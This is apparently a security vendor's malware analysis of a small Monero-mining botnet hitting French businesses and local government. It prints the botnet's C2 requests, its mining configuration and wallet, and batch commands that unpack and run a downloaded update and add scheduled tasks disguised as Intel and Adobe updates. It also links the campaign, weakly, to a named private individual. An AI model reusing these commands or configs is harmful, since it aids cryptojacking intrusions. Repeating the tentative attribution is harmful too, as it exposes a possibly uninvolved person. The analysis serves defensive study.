menu

Contact Us

1 (800) 723-1166 |

Security Labs

HomeSecurity LabsThe 21st Century 49ers: Small-time Cryptocurrency Mining
HomeSecurity LabsThe 21st Century 49ers: Small-time Cryptocurrency Mining

The 21st Century 49ers: Small-time Cryptocurrency Mining

Forcepoint™ Security Labs frequently identify new, unusual, or otherwise interesting pieces of malware. Sometimes these turn out to be elements of large, APT-driven campaigns (e.g. our report into the MONSOON campaign from August 2016: https://blogs.forcepoint.com/security-labs/monsoon-analysis-apt-campaign); other times these can be more 'niche', as is the case with this miniature Monero mining botnet.

Much as the California Gold Rush attracted amateurs lured by the promise of easy money (the original '49ers'), a low barrier-to-entry is tempting amateurs to take up cryptocurrency mining. Unfortunately, these 21st century prospectors don't always stick to legal methods: in January 2017 it was reported[1] that the Sundown Exploit Kit was dropping a cryptocurrency miner based on open source code[2]. At the time, the lack of ‘tradecraft’ evident in this sample was noted and it was suggested that it was representative of a trend towards so-called novices engaging in cybercrime.

February 2017 sees a similar, arguably more successful campaign which appears to affect a range of machines in France, predominantly associated with SMEs and local government systems in the Haut-Rhin region, including:

  • Several local government networks;
  • A garden equipment retailer;
  • Architecture and building firms;
  • A used car dealership.

Malware

The sample analysed (SHA1: 05a02703a19d798415aa98212cf0f7242ba9b4da) is a relatively unremarkable PE file. Upon initial execution it connects to its primary C2 server to download an initial configuration file.

GET /misc/configv36.ini HTTP/1.1
User-Agent: MyAgent
Host: daterup1.ddns[.]net
Cache-Control: no-cache

The malware appears to use the User-Agent string ‘MyAgent’ throughout its communications.

The server returns the following, unobfuscated file. Note that the format places the data effectively as the ‘key’ within numerous sections as opposed to following the more typical INI file standard of key=value pairs.

[VERSIONSERVEUR]
4.04
[NOMMAJ]
AdobeServiceUpdate.exe
[NOMUPDATE]
IntelUpdate.exe
[NOMMINER]
java.exe
[NOMMINERGPU]
javaw2.exe
[CHEMINMAJ]
AdobeServiceUpdate
[CHEMINUPDATE]
IntelGraphics
[CHEMINMINER]
cryptonote
[LISTESERVEURS]
listeserveurs
[SERVEURDOWNLOAD]
hxxp://www.goepper[.]fr/misc/
[SERVEURTEST]
hxxp://daterup1.ddns[.]net/misc/
[SERVEURACTIVITE]
hxxp://daterup1.ddns[.]net/misc/
[SERVEURSECOURS]
hxxp://alurea[.]fr/misc/
[COMMANDE32 DWARF]
-dbg -1 -o stratum+tcp://xmr-eu.dwarfpool[.]com:8005 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p dateretupitsthat@gmail[.]com -t
[COMMANDE64 DWARF]
-a cryptonight -o stratum+tcp://xmr-eu.dwarfpool[.]com:8005 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p dateretupitsthat@gmail[.]com -t
[COMMANDE32 MINERGATE]
-dbg -1 -o stratum+tcp://xdn-xmr.pool.minergate.com:45790 -u daterup@gmx[.]com -p x -t
[COMMANDE64 MINERGATE]
-a cryptonight -o stratum+tcp://xdn-xmr.pool.minergate[.]com:45790 -u daterup@gmx[.]com -p x -t
[COMMANDE32 CRYPTO]
-dbg -1 -o stratum+tcp://xmr.crypto-pool[.]fr:3333 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p x -t
[COMMANDE64 CRYPTO]
-a cryptonight -o stratum+tcp://xmr.crypto-pool[.]fr:3333 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p x -t
[COMMANDE32]
-dbg -1 -o stratum+tcp://fcn-xmr.pool.minergate[.]com:45590 -u daterup@gmx[.]com -p x -t
[COMMANDE64]
-a cryptonight -o stratum+tcp://fcn-xmr.pool.minergate[.]com:45590 -u daterup@gmx[.]com -p x -t
[COMMANDE64YAM]
 -c 1 -M stratum+tcp://daterup%40gmx.com:x@fcn-xmr.pool.minergate[.]com:45590/fcn -t
[COMMANDEGPU]
javaw2.exe -o stratum+tcp://fcn-xmr.pool.minergate[.]com:45590 -u daterup@gmx[.]com -p x
[RAFRAICHMIN]
1800
[RAFRAICHMAX]
3600
[DOWNLOAD]
shortcut.lnk
[DELETE]
version.old

The malware then immediately attempts to request instructions from the server:

GET /misc/workers/commandes/<32/64>-<DOMAIN>-<USER>-<MACHINE_NAME> HTTP/1.1
User-Agent: MyAgent
Host: daterup1.ddns[.]net
Cache-Control: no-cache

In the case of our sandbox, this generated a 404 error – likely as a result of the machine not previously having been infected. In response to this, the malware downloads two files from the predefined download server ([SERVEURDOWNLOAD] in the configuration file):

  • shortcut.lnk
  • filelist36.ini

The contents of filelist36.ini are of a similar format to those seen in configv36.ini and are shown below. Note that the section names used within filelist36.ini appear to have been written in English as opposed to French.

[ARCHIVEMINER32]
archClaymore32.zip
[ARCHIVEMINER64]
archCryptonote64.zip
[ARCHIVEMAJ32]
maj32.36.zip
[ARCHIVEMAJ64]
maj64.36.zip
[ARCHIVEUPDATE]
update.36.zip
[7ZA.EXE]
7za.exe
[7ZA.DLL]
7za.dll
[7ZXA.DLL]
7zxa.dll

The contents of shortcut.lnk are potentially more interesting and the reason for its inclusion in the downloaded files is unclear although, as shown below, the malware appears to mimic the process name of the IntelUpdate process. The file appears to be a properly formatted .lnk file and includes references to the directory/file C:\Users\Alex\AppData\Roaming\IntelGraphics\IntelUpdate.exe and the machine name alex-hp.

If 7zip is not present on the infected machine, the malware downloads the 7zip installation files recorded in filelist36.ini then downloads update.36.zip and unpacks it using the command line version of 7zip.

Note that the password used on the file is literally ‘{pass}’.

timeout 2
cd "%APPDATA%\7z"
7za e -p{pass} -y -w["%APPDATA%\cryptonote"] "%APPDATA%\update.36.zip" -o"%APPDATA%"
del C:\Documents and Settings\user\Desktop\french.exe
move "%APPDATA%\update.exe" C:\Documents and Settings\user\Desktop\french.exe
timeout 2
"C:\Documents and Settings\user\Desktop\french.exe"
del "%APPDATA%\uscript_auto_maj.bat"

The malware then contacts the original C2 again at /misc/workers/allowupdate/<32/64>-<MACHINE_NAME>-<USER>-<MACHINE_NAME>, presumably to check whether to proceed with installing the update, before removing the previous versions of itself and setting up the new version as a new scheduled task:

schtasks /Delete /tn "Microsoft Schelude Update" /F
schtasks /Delete /tn "Microsoft Schelude Updater" /F
schtasks /Delete /tn "Intel Service Update" /F
schtasks /Delete /tn "Adobe Reader Update" /F
schtasks /Delete /tn "update" /F
schtasks /Delete /tn "Adobe Reader Updater" /F
schtasks /create /sc MINUTE /MO 120 /tn "Intel Service Update" /tr "C:\Documents and Settings\user\Application Data\IntelGraphics\IntelUpdate.exe" /F /RL HIGHEST
schtasks /create /sc MINUTE /MO 10 /tn "Adobe Reader Update" /tr "C:\Documents and Settings\user\Application Data\AdobeServiceUpdate\AdobeServiceUpdate.exe" /F /RL HIGHEST
del "C:\Documents and Settings\user\Application Data\tskschl.bat" /F

Once up and running, the malware queries /misc/workers/commandes/<32/64>-<DOMAIN>-<USER>-<MACHINE_NAME> again for additional commands.

C2 Servers

At the time of writing daterup1.ddns[.]net resolves to IP address 88.120.123.246, associated with OVH in France. What appears to be the primary interface is in an open directory and returns the bot control panel when requested (shown below).

Listed among the workers we also see a bot running on a machine named alex-hp, similar to the artefacts observed in the .lnk file:

This page also provides insight into the uptime and success rate of the current campaign, with machines typically appearing to range up to approximately five days of uptime as of 20 February 2017. These victim addresses all appear to be associated with French networks/ISPs, and belong to an apparent mix of home users, SMEs, and local government organisations. 

Another page lists a number of available commands for the botnet owner, including – for reasons unclear – the apparent ability to launch Notepad on the infected machine:

A number of additional C2 and/or download servers were via the listserveurs command. Details of these are listed below, many of which appear to be hosted on otherwise-legitimate websites.

The majority of these servers no longer appear to be in use, although in several cases they still present a control panel listing inactive workers when probed, as pictured below.

Another now-disused C2 (below) shows uptime figures which suggest that the campaign has been active for at least six weeks. This appears to be supported by the dates on which a number of the historical samples were first recorded, with one sample dating back at least as far as November 2016.


Rookie Mistakes?

In the miner example reported in January, the perpetrator left references to his personal Github account in the code – a mistake which was his ultimate undoing.

The actor behind this example appears to have learned from the mistakes recorded in the earlier article and engaged in good ‘hygiene’ as far as Git and email addresses associated with user accounts on mining websites are concerned: the email address daterup@gmx[.]com appears to have been registered exclusively for this campaign.

However, while attribution is always difficult and often far from certain there are still loose threads within this campaign: at the time of writing, daterup1.ddns[.]net resolves to IP 88.120.123.246. This IP address appears again both literally and as the resolved address for the domain blioman[.]ovh in the listserveurs file retrieved on 20 February 2017.

WHOIS data for the domain blioman.ovh records a registrant email of alexandre.thomassin@gmail[.]com creating a possible association with the alex and alex-hp strings noted in both the .lnk file and the list of workers returned by the C2 itself. This name appears again in the registration details for alurea[.]net (a sister domain of alurea[.]fr which resolves to the same IP address) as alexandre.thomassin@mi-informatique[.]fr.

Though a weak association at best – especially given the legitimate nature of the other sites hosting C2 panels – a brief search suggests that a user named blioman has been active within a number of cryptocurrency communities including localbitcoins.com[3], dash.org[4], and moneroclub.com[5].

Conclusion

Monero miners have been observed in the wild before, and the currency is new enough that there is still a relatively high return rate on ‘mining’ activity.

In addition to favourable mining returns compared to other cryptocurrencies, there are a number of other factors which add to its appeal:

  • It was adopted in mid-2016 by AlphaBay and Oasis - two prominent deep-web marketplaces;
  • It offers improved privacy over Bitcoin: its opaque blockchain severely limits the traceability of the currency, thus eliminating the need for laundering before exchanging for conventional currencies;
  • The algorithm used in the mining process is designed to be memory constrained and is thus potentially more suitable to mining on a network of normal home computers than Bitcoin’s CPU-constrained algorithm which better suits specialised, GPU-based mining machines.

While this case appears to be a small, simplistic campaign it is indicative of the low barrier to entry in cybercrime. The ready availability of open source tools combined with well-documented techniques and procedures may well lead to more and more individuals finding themselves tempted to ‘have a go’.

Protection Statement

Forcepoint™ customers are protected against this threat via TRITON® ACE at the following stages of attack:

Stage 5 (Dropper File) - The malware components are prevented from being downloaded and/or executed.

Stage 6 (Call Home) - The HTTP-based C2 traffic is blocked.

Indicators of Compromise

Samples (SHA1)

05a02703a19d798415aa98212cf0f7242ba9b4da
0bfdf18d27d8166c9eec82707574fff1bd37a5d2
49c02edf98dc537d7603b7bade39b58464e14fb0
e106e55fd377daa15151a113ad68c18cec7447c0
8ad17ff1cf0e356f8df6f04b19fa680064dc1b5a
d020ff5b82ff6809c132c176da80e6eab20b5458

C2 Domains

hxxp://altia-residences[.]com/misc
hxxp://alurea[.]fr/misc
hxxp://feuerstein[.]fr/misc
hxxp://goepper[.]fr/misc
hxxp://tiptop[.]fr/misc
hxxp://bmge[.]net/misc
hxxp://vivaldi-france[.]fr/misc
hxxp://blioman[.]ovh:8085/misc
hxxp://88.120.123[.]246:8085/misc
hxxp://daterup1.ddns[.]net/misc

Footnotes

[1] https://blog.malwarebytes.com/cybercrime/2017/01/the-curious-case-of-a-sundown-ek-variant-dropping-a-cryptocurrency-miner/

[2] https://github.com/tsiv/ccminer-cryptonight

[3] https://localbitcoins.com/accounts/profile/Blioman/

[4] https://www.dash.org/forum/members/blioman.3938/

[5] https://www.moneroclub.com/user/1067024038